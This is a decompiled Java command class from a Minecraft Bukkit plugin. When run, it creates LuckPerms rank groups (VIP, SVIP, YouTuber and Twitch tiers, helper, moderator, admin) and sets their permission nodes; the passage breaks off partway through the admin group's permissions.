// 
// Decompiled by Procyon v0.5.30
// 

package pl.virtual.api.commands.cmd;

import pl.virtual.api.commands.Command;
import org.bukkit.Bukkit;
import org.bukkit.command.CommandSender;

public class ZrobrangiCommand extends Command
{
    public ZrobrangiCommand() {
        super("zrobrangi", "zrobrangi", "/zrobrangi", "core.cmd.zrobrangi", new String[] { "zrobrangi" });
    }
    
    @Override
    public boolean onExecute(final CommandSender p, final String[] args) {
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group default permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group default permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group default permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group default permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group default permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup VIP");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set core.kit.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set core.cmd.warp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set tools.cmd.chatvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set core.cmd.ec");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set core.cmd.crafting");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set core.create.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set core.join.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set core.enderchest.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group VIP permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup SVIP");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.kit.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.cmd.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set tools.cmd.chatvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.cmd.ec");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.cmd.crafting");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.cmd.warp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.create.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.cmd.repair");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.kit.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.enderchest.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set core.join.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group SVIP permission set svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup DARK");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.kit.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.cmd.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set tools.cmd.chatvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.cmd.ec");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.cmd.crafting");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.cmd.warp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.create.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.cmd.repair");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.cmd.repairall");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.kit.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.kit.mvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.cmd.freeturbo");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.join.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set core.enderchest.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group DARK permission set dark");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup yt+");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.kit.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.cmd.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.cmd.ec");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set tools.cmd.chatvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.cmd.crafting");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.create.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.cmd.repair");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.cmd.repairall");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.kit.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.kit.mvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.enderchest.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.cmd.warp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.cmd.freeturbo");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set niesienie.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set core.join.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt+ permission set dark");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup yt");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.kit.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.cmd.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.cmd.ec");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.cmd.warp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.cmd.crafting");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set tools.cmd.chatvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.create.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.cmd.repair");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.kit.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.join.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set core.enderchest.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group yt permission set svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup twitch");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.kit.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.cmd.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set tools.cmd.chatvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.cmd.warp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.cmd.ec");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.cmd.crafting");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.create.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.cmd.repair");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.join.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.kit.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set core.enderchest.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group twitch permission set svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup helper");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.sprawdzanie.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.helper");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.sprawdz");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set tools.cmd.helper");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.heal");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.tp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.kick");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.warp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.god");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.fly");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.helpop.view");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.repair");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set tools.cmd.chatvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.ec");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.tp.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.crafting");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.combat.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.chat");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.join.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.ban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.mute");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set core.cmd.vanish");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set verus.alerts");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set nocheatplus.shortcut.info");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set nocheatplus.shortcut.monitor");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set nocheatplus.shortcut.safeadmin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set nocheatplus.shortcut.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set nocheatplus.checks");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group helper permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup moderator");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.helper");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set tools.cmd.helper");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.heal");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.helpop.view");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.tp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.sprawdzanie.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.kick");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.god");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.join.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.fly");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.warp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.repair");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.repairall");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set tools.cmd.chatvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.sprawdz");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.vanish");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.ec");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.tp.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.crafting");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.helpop.view");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.combat.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.chat");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.ban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.mute");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.inv");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.unban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.heal");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.mod");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.unmute");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.ce");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.socialspy");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.list");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set core.cmd.inv");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set verus.alerts");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set dark");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set nocheatplus.shortcut.info");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set nocheatplus.shortcut.monitor");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set nocheatplus.shortcut.safeadmin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set nocheatplus.shortcut.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set nocheatplus.checks");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set bukkit.command.version false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set bukkit.command.plugins false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group moderator permission set bukkit.command.help false");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp creategroup admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.inv");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.helper");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set tools.cmd.helper");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.helpop.view");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set tools.cmd.admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set verus.alerts");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set tools.cmd.chatvip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.heal");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.repairall");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.tp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.kick");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.vanish");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.god");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.fly");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.repair");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.sprawdzanie.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.ec");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.tp.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.warp");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.enderchest.svip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.crafting");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.helpop.view");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.join.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.vip");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.combat.bypass");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.user");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.chat");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.ban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set CustomEnderChest.admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set CustomEnderChest.commands");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.mute");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set modifyworld.*");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.vanish.see");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.inv");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.unban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.heal");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.mod");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.unmute");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.ce");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.socialspy");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.list");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.admin");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.tell.nomsg");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.give");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.enchant");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.day");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.noc");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.clear");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.slowmode");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.i");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.cichyban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.cichyunban");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.speed");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set core.cmd.bc");
        Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "lp group admin permission set niesienie.bypass");
